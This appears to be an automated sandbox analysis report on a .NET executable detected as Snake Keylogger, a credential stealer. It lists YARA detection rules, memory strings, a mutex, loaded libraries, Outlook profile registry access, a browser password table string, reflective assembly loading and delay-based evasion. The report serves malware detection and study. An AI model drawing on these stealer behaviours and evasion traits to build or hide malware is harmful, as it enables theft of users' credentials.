Source: rp8s2rxD5lpuQAG.exe, 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamefbXfjPLUOxpHounQOLpg.exeX vs rp8s2rxD5lpuQAG.exe
Source: rp8s2rxD5lpuQAG.exe, 00000000.00000002.2077703493.0000000003F41000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameReactionDiffusion.dll0 vs rp8s2rxD5lpuQAG.exe
Source: rp8s2rxD5lpuQAG.exe, 00000000.00000002.2077072837.0000000001580000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameAxiom.dll@ vs rp8s2rxD5lpuQAG.exe
Source: rp8s2rxD5lpuQAG.exe, 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs rp8s2rxD5lpuQAG.exe
Source: rp8s2rxD5lpuQAG.exe, 00000000.00000002.2080724592.000000001CCD0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs rp8s2rxD5lpuQAG.exe
Source: rp8s2rxD5lpuQAG.exe, 00000000.00000002.2077703493.0000000004042000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamefbXfjPLUOxpHounQOLpg.exeX vs rp8s2rxD5lpuQAG.exe
Source: rp8s2rxD5lpuQAG.exe, 00000000.00000002.2078403632.0000000013F51000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAxiom.dll@ vs rp8s2rxD5lpuQAG.exe
Source: rp8s2rxD5lpuQAG.exe, 00000000.00000002.2077599751.0000000003B10000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameReactionDiffusion.dll0 vs rp8s2rxD5lpuQAG.exe
Source: rp8s2rxD5lpuQAG.exe, 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamefbXfjPLUOxpHounQOLpg.exeX vs rp8s2rxD5lpuQAG.exe
Source: rp8s2rxD5lpuQAG.exe, 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamefbXfjPLUOxpHounQOLpg.exeX vs rp8s2rxD5lpuQAG.exe
Source: rp8s2rxD5lpuQAG.exe | Binary or memory string: OriginalFilenamelaoA.exeB vs rp8s2rxD5lpuQAG.exe
Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger | author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 3.2.rp8s2rxD5lpuQAG.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.rp8s2rxD5lpuQAG.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.rp8s2rxD5lpuQAG.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 3.2.rp8s2rxD5lpuQAG.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: rp8s2rxD5lpuQAG.exe PID: 3688, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: rp8s2rxD5lpuQAG.exe PID: 3688, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: rp8s2rxD5lpuQAG.exe PID: 4304, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: rp8s2rxD5lpuQAG.exe PID: 4304, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: rp8s2rxD5lpuQAG.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@4/3
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\rp8s2rxD5lpuQAG.exe.logJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeMutant created: NULL
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeMutant created: \Sessions\1\BaseNamedObjects\XTEInUtACcxhEmxZDnsuX
            Source: rp8s2rxD5lpuQAG.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: rp8s2rxD5lpuQAG.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003D34000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003D64000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003D26000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003D16000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4500739891.0000000013AD2000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003D70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: rp8s2rxD5lpuQAG.exeReversingLabs: Detection: 55%
            Source: unknownProcess created: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe "C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe"
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess created: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess created: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: dwrite.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: rasapi32.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: rasman.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: rtutils.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: secur32.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: rp8s2rxD5lpuQAG.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: rp8s2rxD5lpuQAG.exe | Static PE information: Image base 0x140000000 > 0x60000000
            Source: rp8s2rxD5lpuQAG.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: rp8s2rxD5lpuQAG.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: laoA.pdb | source: rp8s2rxD5lpuQAG.exe
            Source: Binary string: laoA.pdbSHA256Bi | source: rp8s2rxD5lpuQAG.exe

            Data Obfuscation

            Source: rp8s2rxD5lpuQAG.exe, Form1.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: rp8s2rxD5lpuQAG.exe | Static PE information: 0xB3565870 [Tue May 5 20:20:00 2065 UTC]
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Code function: 0_2_00007FF848F4A989 push E9FFFFFFh; iretd 0_2_00007FF848F4A98F
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Code function: 0_2_00007FF848F400BD pushad ; iretd 0_2_00007FF848F400C1
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Code function: 0_2_00007FF848F4E8D8 push E9605589h; ret 0_2_00007FF848F4E8DE
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Code function: 3_2_00007FF848F300BD pushad ; iretd 3_2_00007FF848F300C1
            Source: rp8s2rxD5lpuQAG.exe | Static PE information: section name: .text entropy: 7.66181548748652
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Memory allocated: 12E0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Memory allocated: 1BF40000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Memory allocated: 1240000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Memory allocated: 1BA40000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 600000
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 599889
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 599781
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 599671
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 599562
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 599453
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 599343
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 599232
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 599009
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 598904
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 598796
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 598687
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 598578
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 598468
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 598359
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 598250
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 598140
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 598031
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 597921
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 597812
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 597703
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 597593
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 597484
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 597374
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 597265
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 597156
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 597046
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 596937
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 596828
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 596718
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 596609
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 596499
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 596390
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 596281
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 596171
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 596062
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 595953
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 595843
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 595734
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 595625
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 595515
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 595405
